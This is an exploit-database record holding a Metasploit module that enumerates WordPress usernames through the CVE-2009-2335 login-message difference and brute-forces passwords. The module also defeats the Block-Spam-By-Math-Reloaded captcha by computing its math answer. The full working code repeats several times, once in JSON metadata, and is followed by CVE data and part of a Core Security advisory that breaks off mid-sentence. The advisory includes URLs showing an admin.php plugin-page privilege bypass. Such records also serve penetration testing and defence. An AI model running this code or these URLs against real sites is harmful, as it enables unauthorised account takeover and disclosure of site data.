##
# $Id: wordpress_login_enum.rb 12196 2011-04-01 00:51:33Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Wordpress Brute Force and User Enumeration Utility',
'Version' => '$Revision: 12196 $',
'Description' => 'Wordpress Authentication Brute Force and User Enumeration Utility',
'Author' => [
'Alligator Security Team',
'Tiago Ferreira <tiago.ccna[at]gmail.com>',
'Heyder Andrade <heyder[at]alligatorteam.org>' # Block-Spam-By-Math-Reloaded Bypass
],
'References' =>
[
['BID', '35581'],
['CVE', '2009-2335'],
['OSVDB', '55713'],
],
'License' => MSF_LICENSE
)
register_options(
[ Opt::RPORT(80),
OptString.new('URI', [false, 'Define the path to the wp-login.php file', '/wp-login.php']),
OptBool.new('VALIDATE_USERS', [ true, "Enumerate usernames", true ]),
OptBool.new('BSBM_BYPASS', [ true, "Block-Spam-By-Math-Reloaded Bypass ", false]),
OptBool.new('BRUTEFORCE', [ true, "Perform brute force authentication", true ]),
], self.class)
end
def target_url
"http://#{vhost}:#{rport}#{datastore['URI']}"
end
def run_host(ip)
if datastore['VALIDATE_USERS']
@users_found = {}
vprint_status("#{target_url} - WordPress Enumeration - Running User Enumeration")
each_user_pass { |user, pass|
do_enum(user)
}
unless (@users_found.empty?)
print_good("#{target_url} - WordPress Enumeration - Found #{uf = @users_found.keys.size} valid #{uf == 1 ? "user" : "users"}")
end
end
if datastore['BRUTEFORCE']
vprint_status("#{target_url} - WordPress Brute Force - Running Bruteforce")
if datastore['VALIDATE_USERS']
if @users_found && @users_found.keys.size > 0
vprint_status("#{target_url} - WordPress Brute Force - Skipping all but #{uf = @users_found.keys.size} valid #{uf == 1 ? "user" : "users"}")
else
vprint_status("#{target_url} - WordPress Brute Force - No valid users found. Exiting.")
return
end
end
each_user_pass { |user, pass|
if datastore['VALIDATE_USERS']
next unless @users_found[user]
end
do_login(user, pass)
}
end
end
def do_enum(user=nil)
post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=x&wp-submit=Login"
print_status("#{target_url} - WordPress Enumeration - Checking Username:'#{user}'")
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['URI'],
'data' => post_data,
}, 20)
valid_user = false
if (res and res.code == 200 )
if (res.body.to_s =~ /Incorrect password/ )
valid_user = true
elsif (res.body.to_s =~ /document\.getElementById\(\'user_pass\'\)/ )
valid_user = true
else
valid_user = false
end
else
print_error("#{target_url} - WordPress Enumeration - Enumeration is not possible. #{res.code} response")
return :abort
end
if valid_user
print_good("#{target_url} - WordPress Enumeration- Username: '#{user}' - is VALID")
report_auth_info(
:host => rhost,
:sname => 'http',
:user => user,
:port => rport,
:proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}"
)
@users_found[user] = :reported
return :next_user
else
vprint_error("#{target_url} - WordPress Enumeration - Invalid Username: '#{user}'")
return :skip_user
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
def smartaleck(values)
answer = 0
values.each { |a| answer+=a.to_i }
return answer
end
def getvalues(response)
i = 0
values = []
while (i <= 1) do
response.body.match(%r{.?(mathvalue#{i}).*(value=).([\d]+)})
values[i] = $3
i += 1
end
return values
end
def baserequest()
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['URI'],
}, 20)
return res
end
end
def do_login(user=nil,pass=nil)
if (datastore['BSBM_BYPASS'])
v = getvalues(baserequest())
sec_answer = smartaleck(v)
post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&mathvalue2=#{sec_answer}&mathvalue0=#{v[0]}&mathvalue1=#{v[1]}&&wp-submit=Login"
else
post_data = "log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&wp-submit=Login"
vprint_status("#{target_url} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'")
end
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['URI'],
'data' => post_data,
}, 20)
if (res and res.code == 302 )
if res.headers['Set-Cookie'].match(/wordpress_logged_in_(.*);/i)
print_good("#{target_url} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'")
report_auth_info(
:host => rhost,
:port => rport,
:sname => 'http',
:user => user,
:pass => pass,
:proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}, COOKIE=#{res.headers['Set-Cookie']}",
:active => true
)
return :next_user
end
print_error("#{target_url} - WordPress Brute Force - Unrecognized 302 response")
return :abort
elsif res.body.to_s =~ /login_error/
vprint_error("#{target_url} - WordPress Brute Force - Failed to login as '#{user}'")
return
else
print_error("#{target_url} - WordPress Brute Force - Unrecognized #{res.code} response") if res
return :abort
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
{"id": "EDB-ID:17702", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress Block-Spam-By-Math-Reloaded Plugin - Bypass", "description": "WordPress Block-Spam-By-Math-Reloaded Plugin - Bypass. CVE-2009-2335. Webapps exploit for php platform", "published": "2011-08-20T00:00:00", "modified": "2011-08-20T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/17702/", "reporter": "Tiago Ferreira and Heyder Andrade", "references": [], "cvelist": ["CVE-2009-2335"], "lastseen": "2016-02-02T08:23:15", "viewCount": 5, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2016-02-02T08:23:15", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2335"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_LOGIN_ENUM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:104268", "PACKETSTORM:79033"]}, {"type": "seebug", "idList": ["SSV:11777", "SSV:14855", "SSV:11787"]}, {"type": "openvas", "idList": ["OPENVAS:64699", "OPENVAS:136141256231064407", "OPENVAS:64407", "OPENVAS:64697", "OPENVAS:136141256231064404", "OPENVAS:136141256231064699", "OPENVAS:64404", "OPENVAS:1361412562310800662", "OPENVAS:136141256231064697", "OPENVAS:1361412562310800657"]}, {"type": "nessus", "idList": ["FEDORA_2009-8538.NASL", "FEDORA_2009-7701.NASL", "FEDORA_2009-8529.NASL", "FEDORA_2009-7729.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22142", "SECURITYVULNS:VULN:10056"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EA9973B6F5F19BFE8F3E86AA281A9086"]}], "modified": "2016-02-02T08:23:15", "rev": 2}, "vulnersScore": 6.4}, "sourceHref": "https://www.exploit-db.com/download/17702/", "sourceData": "##\r\n# $Id: wordpress_login_enum.rb 12196 2011-04-01 00:51:33Z egypt $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Auxiliary::AuthBrute\r\n\tinclude Msf::Auxiliary::Report\r\n\tinclude Msf::Auxiliary::Scanner\r\n\r\n\r\n\tdef initialize\r\n\t\tsuper(\r\n\t\t\t'Name' => 'Wordpress Brute Force and User Enumeration Utility',\r\n\t\t\t'Version' => '$Revision: 12196 $',\r\n\t\t\t'Description' => 'Wordpress Authentication Brute Force and User Enumeration Utility',\r\n\t\t\t'Author' => [\r\n\t\t\t\t'Alligator Security Team',\r\n\t\t\t\t'Tiago Ferreira <tiago.ccna[at]gmail.com>',\r\n 'Heyder Andrade <heyder[at]alligatorteam.org>' # Block-Spam-By-Math-Reloaded Bypass\r\n\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['BID', '35581'],\r\n\t\t\t\t\t['CVE', '2009-2335'],\r\n\t\t\t\t\t['OSVDB', '55713'],\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE\r\n\t\t)\r\n\r\n\t\tregister_options(\r\n\t\t\t[ Opt::RPORT(80),\r\n\t\t\t\tOptString.new('URI', [false, 'Define the path to the wp-login.php file', '/wp-login.php']),\r\n\t\t\t\tOptBool.new('VALIDATE_USERS', [ true, \"Enumerate usernames\", true ]),\r\n\t\t\t\tOptBool.new('BSBM_BYPASS', [ true, \"Block-Spam-By-Math-Reloaded Bypass \", false]),\r\n\t\t\t\tOptBool.new('BRUTEFORCE', [ true, \"Perform brute force authentication\", true ]),\r\n\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef target_url\r\n\t\t\"http://#{vhost}:#{rport}#{datastore['URI']}\"\r\n\tend\r\n\r\n\r\n\tdef run_host(ip)\r\n\t\tif datastore['VALIDATE_USERS']\r\n\t\t\t@users_found = {}\r\n\t\t\tvprint_status(\"#{target_url} - WordPress Enumeration - Running User Enumeration\")\r\n\t\t\teach_user_pass { |user, pass|\r\n\t\t\t\tdo_enum(user)\r\n\t\t\t}\r\n\r\n\t\t\tunless (@users_found.empty?)\r\n\t\t\t\tprint_good(\"#{target_url} - WordPress Enumeration - Found #{uf = @users_found.keys.size} valid #{uf == 1 ? \"user\" : \"users\"}\")\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\tif datastore['BRUTEFORCE']\r\n\t\t\tvprint_status(\"#{target_url} - WordPress Brute Force - Running Bruteforce\")\r\n\t\t\tif datastore['VALIDATE_USERS']\r\n\t\t\t\tif @users_found && @users_found.keys.size > 0\r\n\t\t\t\t\tvprint_status(\"#{target_url} - WordPress Brute Force - Skipping all but #{uf = @users_found.keys.size} valid #{uf == 1 ? \"user\" : \"users\"}\")\r\n\t\t\t\telse\r\n\t\t\t\t\tvprint_status(\"#{target_url} - WordPress Brute Force - No valid users found. Exiting.\")\r\n\t\t\t\t\treturn\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\t\teach_user_pass { |user, pass|\r\n\t\t\t\tif datastore['VALIDATE_USERS']\r\n\t\t\t\t\tnext unless @users_found[user]\r\n\t\t\t\tend\r\n\t\t\t\t\tdo_login(user, pass)\r\n\t\t\t}\r\n\t\tend\r\n\tend\r\n\r\n\tdef do_enum(user=nil)\r\n\t\tpost_data = \"log=#{Rex::Text.uri_encode(user.to_s)}&pwd=x&wp-submit=Login\"\r\n\t\tprint_status(\"#{target_url} - WordPress Enumeration - Checking Username:'#{user}'\")\r\n\r\n\t\tbegin\r\n\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'method' => 'POST',\r\n\t\t\t\t'uri' => datastore['URI'],\r\n\t\t\t\t'data' => post_data,\r\n\t\t\t}, 20)\r\n\r\n\r\n\t\t\tvalid_user = false\r\n\r\n\t\t\tif (res and res.code == 200 )\r\n\t\t\t\tif (res.body.to_s =~ /Incorrect password/ )\r\n\t\t\t\t\tvalid_user = true\r\n\r\n\t\t\t\telsif (res.body.to_s =~ /document\\.getElementById\\(\\'user_pass\\'\\)/ )\r\n\t\t\t\t\tvalid_user = true\r\n\r\n\t\t\t\telse\r\n\t\t\t\t\tvalid_user = false\r\n\r\n\t\t\t\tend\r\n\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"#{target_url} - WordPress Enumeration - Enumeration is not possible. #{res.code} response\")\r\n\t\t\t\treturn :abort\r\n\r\n\t\t\tend\r\n\r\n\t\t\tif valid_user\r\n\t\t\t\tprint_good(\"#{target_url} - WordPress Enumeration- Username: '#{user}' - is VALID\")\r\n\t\t\t\treport_auth_info(\r\n\t\t\t\t\t:host => rhost,\r\n\t\t\t\t\t:sname => 'http',\r\n\t\t\t\t\t:user => user,\r\n\t\t\t\t\t:port => rport,\r\n\t\t\t\t\t:proof => \"WEBAPP=\\\"Wordpress\\\", VHOST=#{vhost}\"\r\n\t\t\t\t)\r\n\r\n\t\t\t\t@users_found[user] = :reported\r\n\t\t\t\treturn :next_user\r\n\t\t\telse\r\n\t\t\t\tvprint_error(\"#{target_url} - WordPress Enumeration - Invalid Username: '#{user}'\")\r\n\t\t\t\treturn :skip_user\r\n\t\t\tend\r\n\r\n\t\trescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\r\n\t\trescue ::Timeout::Error, ::Errno::EPIPE\r\n\t\tend\r\n\tend\r\n\r\n def smartaleck(values)\r\n answer = 0 \r\n values.each { |a| answer+=a.to_i }\r\n return answer\r\n end\r\n\r\n def getvalues(response)\r\n i = 0 \r\n values = []\r\n while (i <= 1) do\r\n response.body.match(%r{.?(mathvalue#{i}).*(value=).([\\d]+)})\r\n values[i] = $3\r\n i += 1\r\n end \r\n return values\r\n end\r\n\r\n def baserequest()\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => datastore['URI'],\r\n }, 20) \r\n return res\r\n end\r\n end\r\n\r\n\r\n\tdef do_login(user=nil,pass=nil)\r\n if (datastore['BSBM_BYPASS'])\r\n v = getvalues(baserequest())\r\n sec_answer = smartaleck(v)\r\n\t\t post_data = \"log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&mathvalue2=#{sec_answer}&mathvalue0=#{v[0]}&mathvalue1=#{v[1]}&&wp-submit=Login\"\r\n else\r\n\t\t post_data = \"log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&wp-submit=Login\"\r\n\t\t vprint_status(\"#{target_url} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'\")\r\n end\r\n\r\n\t\tbegin\r\n\r\n\t\t\tres = send_request_cgi({\r\n\t\t\t\t'method' => 'POST',\r\n\t\t\t\t'uri' => datastore['URI'],\r\n\t\t\t\t'data' => post_data,\r\n\t\t\t}, 20)\r\n\r\n\t\t\tif (res and res.code == 302 )\r\n\t\t\t\tif res.headers['Set-Cookie'].match(/wordpress_logged_in_(.*);/i)\r\n\t\t\t\t\tprint_good(\"#{target_url} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'\")\r\n\t\t\t\t\treport_auth_info(\r\n\t\t\t\t\t\t:host => rhost,\r\n\t\t\t\t\t\t:port => rport,\r\n\t\t\t\t\t\t:sname => 'http',\r\n\t\t\t\t\t\t:user => user,\r\n\t\t\t\t\t\t:pass => pass,\r\n\t\t\t\t\t\t:proof => \"WEBAPP=\\\"Wordpress\\\", VHOST=#{vhost}, COOKIE=#{res.headers['Set-Cookie']}\",\r\n\t\t\t\t\t\t:active => true\r\n\t\t\t\t\t)\r\n\r\n\t\t\t\t\treturn :next_user\r\n\t\t\t\tend\r\n\r\n\t\t\t\tprint_error(\"#{target_url} - WordPress Brute Force - Unrecognized 302 response\")\r\n\t\t\t\treturn :abort\r\n\r\n\t\t\telsif res.body.to_s =~ /login_error/\r\n\t\t\t\tvprint_error(\"#{target_url} - WordPress Brute Force - Failed to login as '#{user}'\")\r\n\t\t\t\treturn\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"#{target_url} - WordPress Brute Force - Unrecognized #{res.code} response\") if res\r\n\t\t\t\treturn :abort\r\n\t\t\tend\r\n\r\n\t\trescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\r\n\t\trescue ::Timeout::Error, ::Errno::EPIPE\r\n\t\tend\r\n\tend\r\nend\r\n\r\n", "osvdbidlist": ["55713"]}
{"cve": [{"lastseen": "2020-12-09T19:31:20", "description": "WordPress and WordPress MU before 2.8.1 exhibit different behavior for a failed login attempt depending on whether the user account exists, which allows remote attackers to enumerate valid usernames. NOTE: the vendor reportedly disputes the significance of this issue, indicating that the behavior exists for \"user convenience.\"", "edition": 5, "cvss3": {}, "published": "2009-07-10T21:00:00", "title": "CVE-2009-2335", "type": "cve", "cwe": ["CWE-16"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2335"], "modified": "2018-11-08T20:38:00", "cpe": [], "id": "CVE-2009-2335", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2335", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "packetstorm": [{"lastseen": "2016-12-05T22:24:49", "description": "", "published": "2011-08-21T00:00:00", "type": "packetstorm", "title": "WordPress Block-Spam-By-Math-Reloaded Plugin Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2335"], "modified": "2011-08-21T00:00:00", "id": "PACKETSTORM:104268", "href": "https://packetstormsecurity.com/files/104268/WordPress-Block-Spam-By-Math-Reloaded-Plugin-Bypass.html", "sourceData": "`## \n# $Id: wordpress_login_enum.rb 12196 2011-04-01 00:51:33Z egypt $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nclass Metasploit3 < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Auxiliary::AuthBrute \ninclude Msf::Auxiliary::Report \ninclude Msf::Auxiliary::Scanner \n \n \ndef initialize \nsuper( \n'Name' => 'Wordpress Brute Force and User Enumeration Utility', \n'Version' => '$Revision: 12196 $', \n'Description' => 'Wordpress Authentication Brute Force and User Enumeration Utility', \n'Author' => [ \n'Alligator Security Team', \n'Tiago Ferreira <tiago.ccna[at]gmail.com>', \n'Heyder Andrade <heyder[at]alligatorteam.org>' # Block-Spam-By-Math-Reloaded Bypass \n], \n'References' => \n[ \n['BID', '35581'], \n['CVE', '2009-2335'], \n['OSVDB', '55713'], \n], \n'License' => MSF_LICENSE \n) \n \nregister_options( \n[ Opt::RPORT(80), \nOptString.new('URI', [false, 'Define the path to the wp-login.php file', '/wp-login.php']), \nOptBool.new('VALIDATE_USERS', [ true, \"Enumerate usernames\", true ]), \nOptBool.new('BSBM_BYPASS', [ true, \"Block-Spam-By-Math-Reloaded Bypass \", false]), \nOptBool.new('BRUTEFORCE', [ true, \"Perform brute force authentication\", true ]), \n], self.class) \n \nend \n \ndef target_url \n\"http://#{vhost}:#{rport}#{datastore['URI']}\" \nend \n \n \ndef run_host(ip) \nif datastore['VALIDATE_USERS'] \n@users_found = {} \nvprint_status(\"#{target_url} - WordPress Enumeration - Running User Enumeration\") \neach_user_pass { |user, pass| \ndo_enum(user) \n} \n \nunless (@users_found.empty?) \nprint_good(\"#{target_url} - WordPress Enumeration - Found #{uf = @users_found.keys.size} valid #{uf == 1 ? \"user\" : \"users\"}\") \nend \nend \n \nif datastore['BRUTEFORCE'] \nvprint_status(\"#{target_url} - WordPress Brute Force - Running Bruteforce\") \nif datastore['VALIDATE_USERS'] \nif @users_found && @users_found.keys.size > 0 \nvprint_status(\"#{target_url} - WordPress Brute Force - Skipping all but #{uf = @users_found.keys.size} valid #{uf == 1 ? \"user\" : \"users\"}\") \nelse \nvprint_status(\"#{target_url} - WordPress Brute Force - No valid users found. Exiting.\") \nreturn \nend \nend \neach_user_pass { |user, pass| \nif datastore['VALIDATE_USERS'] \nnext unless @users_found[user] \nend \ndo_login(user, pass) \n} \nend \nend \n \ndef do_enum(user=nil) \npost_data = \"log=#{Rex::Text.uri_encode(user.to_s)}&pwd=x&wp-submit=Login\" \nprint_status(\"#{target_url} - WordPress Enumeration - Checking Username:'#{user}'\") \n \nbegin \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => datastore['URI'], \n'data' => post_data, \n}, 20) \n \n \nvalid_user = false \n \nif (res and res.code == 200 ) \nif (res.body.to_s =~ /Incorrect password/ ) \nvalid_user = true \n \nelsif (res.body.to_s =~ /document\\.getElementById\\(\\'user_pass\\'\\)/ ) \nvalid_user = true \n \nelse \nvalid_user = false \n \nend \n \nelse \nprint_error(\"#{target_url} - WordPress Enumeration - Enumeration is not possible. #{res.code} response\") \nreturn :abort \n \nend \n \nif valid_user \nprint_good(\"#{target_url} - WordPress Enumeration- Username: '#{user}' - is VALID\") \nreport_auth_info( \n:host => rhost, \n:sname => 'http', \n:user => user, \n:port => rport, \n:proof => \"WEBAPP=\\\"Wordpress\\\", VHOST=#{vhost}\" \n) \n \n@users_found[user] = :reported \nreturn :next_user \nelse \nvprint_error(\"#{target_url} - WordPress Enumeration - Invalid Username: '#{user}'\") \nreturn :skip_user \nend \n \nrescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout \nrescue ::Timeout::Error, ::Errno::EPIPE \nend \nend \n \ndef smartaleck(values) \nanswer = 0 \nvalues.each { |a| answer+=a.to_i } \nreturn answer \nend \n \ndef getvalues(response) \ni = 0 \nvalues = [] \nwhile (i <= 1) do \nresponse.body.match(%r{.?(mathvalue#{i}).*(value=).([\\d]+)}) \nvalues[i] = $3 \ni += 1 \nend \nreturn values \nend \n \ndef baserequest() \nbegin \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => datastore['URI'], \n}, 20) \nreturn res \nend \nend \n \n \ndef do_login(user=nil,pass=nil) \nif (datastore['BSBM_BYPASS']) \nv = getvalues(baserequest()) \nsec_answer = smartaleck(v) \npost_data = \"log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&mathvalue2=#{sec_answer}&mathvalue0=#{v[0]}&mathvalue1=#{v[1]}&&wp-submit=Login\" \nelse \npost_data = \"log=#{Rex::Text.uri_encode(user.to_s)}&pwd=#{Rex::Text.uri_encode(pass.to_s)}&wp-submit=Login\" \nvprint_status(\"#{target_url} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'\") \nend \n \nbegin \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => datastore['URI'], \n'data' => post_data, \n}, 20) \n \nif (res and res.code == 302 ) \nif res.headers['Set-Cookie'].match(/wordpress_logged_in_(.*);/i) \nprint_good(\"#{target_url} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'\") \nreport_auth_info( \n:host => rhost, \n:port => rport, \n:sname => 'http', \n:user => user, \n:pass => pass, \n:proof => \"WEBAPP=\\\"Wordpress\\\", VHOST=#{vhost}, COOKIE=#{res.headers['Set-Cookie']}\", \n:active => true \n) \n \nreturn :next_user \nend \n \nprint_error(\"#{target_url} - WordPress Brute Force - Unrecognized 302 response\") \nreturn :abort \n \nelsif res.body.to_s =~ /login_error/ \nvprint_error(\"#{target_url} - WordPress Brute Force - Failed to login as '#{user}'\") \nreturn \nelse \nprint_error(\"#{target_url} - WordPress Brute Force - Unrecognized #{res.code} response\") if res \nreturn :abort \nend \n \nrescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout \nrescue ::Timeout::Error, ::Errno::EPIPE \nend \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/104268/wordpress_login_enum.rb.txt"}, {"lastseen": "2016-12-05T22:24:57", "description": "", "published": "2009-07-08T00:00:00", "type": "packetstorm", "title": "Core Security Technologies Advisory 2009.0515", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0196", "CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-08T00:00:00", "id": "PACKETSTORM:79033", "href": "https://packetstormsecurity.com/files/79033/Core-Security-Technologies-Advisory-2009.0515.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nCore Security Technologies - CoreLabs Advisory \nhttp://www.coresecurity.com/corelabs/ \n \nWordPress Privileges Unchecked in admin.php and Multiple Information \nDisclosures \n \n \n \n1. *Advisory Information* \n \nTitle: WordPress Privileges Unchecked in admin.php and Multiple \nInformation Disclosures \nAdvisory ID: CORE-2009-0515 \nAdvisory URL: \nhttp://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked \nDate published: 2009-07-08 \nDate of last update: 2009-07-08 \nVendors contacted: WordPress \nRelease mode: Coordinated release \n \n \n2. *Vulnerability Information* \n \nClass: Local file include, Privileges unchecked, Cross site scripting \n(XSS), Information disclosure \nRemotely Exploitable: Yes \nLocally Exploitable: No \nBugtraq ID: 35581, 35584 \nCVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336 \n \n \n3. *Vulnerability Description* \n \nWordPress is a web application written in PHP that allows the easy \ninstallation of a flexible weblog on any computer connected to the \nInternet. WordPress 2.7 reached more than 6 million downloads during \nJune 2009 [9]. \n \nA vulnerability was found in the way that WordPress handles some URL \nrequests. This results in unprivileged users viewing the content of \nplugins configuration pages, and also in some plugins modifying plugin \noptions and injecting JavaScript code. Arbitrary native code may be run \nby a malicious attacker if the blog administrator runs injected \nJavasScript code that edits blog PHP code. Many WordPress-powered blogs, \nhosted outside 'wordpress.com', allow any person to create unprivileged \nusers called subscribers. Other sensitive username information \ndisclosures were found in WordPress. \n \n \n4. *Vulnerable packages* \n \n. WordPress 2.8 and previous \n. WordPress MU 2.7.1 and previous, used in WordPress.com \n \n \n5. *Non-vulnerable packages* \n \n. WordPress 2.8.1 \n. WordPress MU 2.8.1, used in WordPress.com \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nMitigation for the Privileges Unchecked vulnerability (suggested by Core \nSecurity): this vulnerability may be mitigated by controlling access to \nfiles inside the 'wp-admin' folder. Access can be prohibited by using \nApache access control mechanism ('.htaccess' file), see guideline for \nmore information [11]. \n \n \n7. *Credits* \n \nThese vulnerabilities were discovered and researched by Fernando \nArnaboldi and Jos\u00e9 Orlicki from Core Security Technologies. Further \nresearch was made by Jose Orlicki from Core Security Technologies. \n \n \n8. *Technical Description / Proof of Concept Code* \n \n \n8.1. *Introduction* \n \nIn the last few years several security bugs were found in WordPress \n[1][2]. During 2008, the big amount of bugs reported by researchers lead \nto exploitation by blog spammers [3]. During 2009, a new round of \nattacks has appeared and security researchers are reporting new bugs or \nwrongly fixed previously-reported bugs [4][5]. A path traversal in local \nfiles included by 'admin.php' has been fixed [6][7] but, in our case, we \nreport that administrative privileges are still unchecked when accessing \nany PHP file inside a plugin folder. \n \n \n8.2. *Access Control Roles* \n \nWordPress has a privilege model where any user has an assigned role [8]. \nRegarding plugins only users characterized by the role Administrator can \nactivate plugins. Notice that only the blog hosting owner can add new \nplugins because these must by copied inside the host filesystem. The \nroles Editor, Author or Subscriber (the latter has the least privileges) \ncannot activate plugins, edit plugins, update plugins nor delete plugins \ninstalled by an Administrator. Besides that, the configuration of \nspecific plugins is a grey area because there is no distinguished \ncapability assigned [8]. \n \nAlso due to cross-site scripting vulnerabilities inside plugins options \n(something very common), non-administrative users reconfiguring plugins \nmay inject persistent JavaScript code. Possibly arbitrary native code \ncan be executed by the attacker if the blog administrator runs injected \nJavasScript code that injects PHP code. It is important to observe that \nmany WordPress-powered blogs are configured to allow any blog visitor to \ncreate a Subscriber user without confirmation from the Administrator \nrole inside the following URL, although by default the Administrator \nrole must create these new users. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-login.php?action=register \n- -----------/ \n \nThis can be modified by the administrator in 'Membership/Anyone can \nregister'. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/options-general.php \n- -----------/ \n \n \n \n \n8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes \n(CVE-2009-2334, BID 35581)* \n \nNo privileges are checked on WordPress plugins configuration PHP modules \nusing parameter 'page' when we replace 'options-general.php' with \n'admin.php'. The same thing happens when replacing other modules such as \n'plugins.php' with 'admin.php'. Basic information disclosure is done \nthis way. For example, with the following URL a user with no privileges \ncan see the configuration of plugin Collapsing Archives, if installed. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt \n- -----------/ \n \nInstead of the following allowed URL. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt \n- -----------/ \n \nAnother example of this information disclosure is shown on Akismet, a \nplugin shipped by default with WordPress. \n \n/----------- \n \nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt \n- -----------/ \n \nAll plugins we have tested are vulnerable to this kind of information \ndisclosure, but in many of them the PHP files accessed just crashed. On \nthe other hand, for example, with capability 'import', privileges are \nchecked inside 'admin.php': \n \n/----------- \n \nif ( ! current_user_can('import') ) \nwp_die(__('You are not allowed to import.')); \n- -----------/ \n \nMore dangerous scenarios exist, all of them can be exploited by users \nwith the Subscriber role, the least privileged. \n \n \n8.4. *Abuse example: XSS in plugin configuration module* \n \nIf installed, *Related Ways To Take Action* is an example of a WordPress \nplugin that is affected by many cross-site scripting vulnerabilities \n(XSS) 